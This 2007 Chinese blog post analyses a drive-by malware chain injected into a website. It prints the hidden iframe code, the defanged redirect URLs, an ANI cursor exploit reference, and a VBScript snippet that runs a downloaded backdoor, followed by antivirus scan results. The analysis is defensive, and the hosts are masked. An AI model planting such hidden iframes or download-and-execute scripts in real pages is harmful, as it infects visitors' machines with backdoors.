endurer 原创
2007-04-19 第1版
植入的代码为:
/---
<iframe src=hxxp://www.y*xg**m7****8.com/y*x.htm width=0 height=0></iframe>
---/
hxxp://www.y*xg**m7****8.com/y*x.htm 包含代码:
/---
<iframe src="hxxp://l****l*8**0.com/x**x/x**x.htm" width=1 height=1></iframe>
---/
hxxp://l****l*8**0.com/x**x/x**x.htm 包含代码:
/---
<iframe src="hxxp://l****l*8**0.com/x**x/x**x**1.htm" width=100 height=1></iframe>
<iframe src="hxxp://l****l*8**0.com/x**x/x**x**2.htm" width=100 height=1></iframe>
---/
hxxp://l****l*8**0.com/x**x/x**x**1.htm 包含代码:
/---
<DIV style="CURSOR: url('hxxp://l****l*8**0.com/x**x/xx2.jpg')">
利用ANI漏洞 通过 xx2.jpg 下载文件 xx.exe。
hxxp://l****l*8**0.com/x**x/x**x**2.htm 的内容为分为两部分。
第一部分为VBScript代码,功能是 利用 Microsoft.XMLHTTP 和 scrīpting.FileSystemObject 下载文件 xx.exe,保存为c:/xiaogang.exe。然后创建内容为
/---
Set Shell = CreateObject("Wscript.Shell")
Shell.Run ("c:/xiaogang.exe")
Set Shell = Nothing
---/
的文件xiaogang.vbs。
通过Shell.Application 对象 Zhong 的 ShellExecute 方法 执行xiaogang.vbs,从而运行xiaogang.exe。
第二部分是jscript代码:是输出迷惑信息:
/---
你好,您所访问的页面正在加载中...请稍候片刻....
---/
文件说明符 : d:/test/xx.exe
属性 : A---
语言 : 英语(美国)
文件版本 :
说明 :
版权 : (C) Microsoft Corporation. All rights reserved.
备注 :
产品版本 :
产品名称 : Microsoft(R) Windows(R) Operating System
公司名称 : Microsoft Corporation
合法商标 :
内部名称 :
源文件名 :
创建时间 : 2007-4-19 22:49:7
修改时间 : 2007-4-19 22:49:8
访问时间 : 2007-4-19 0:0:0
大小 : 17436 字节 17.28 KB
MD5 : 86ac4df3630f76bbfb5265746d52eca3
Scanned file: xx.exe - Infected
xx.exe - infected by Backdoor.Win32.Agent.ahj
Statistics:
Known viruses: | 299444 | Updated: | 19-04-2007 |
File size (Kb): | 18 | Virus bodies: | 1 |
Files: | 1 | Warnings: | 0 |
Archives: | 0 | Suspicious: | 0 |
标签:某易,exe,ahj,hxxp,htm,ANI,---,iframe,com From: https://blog.51cto.com/endurer/5902286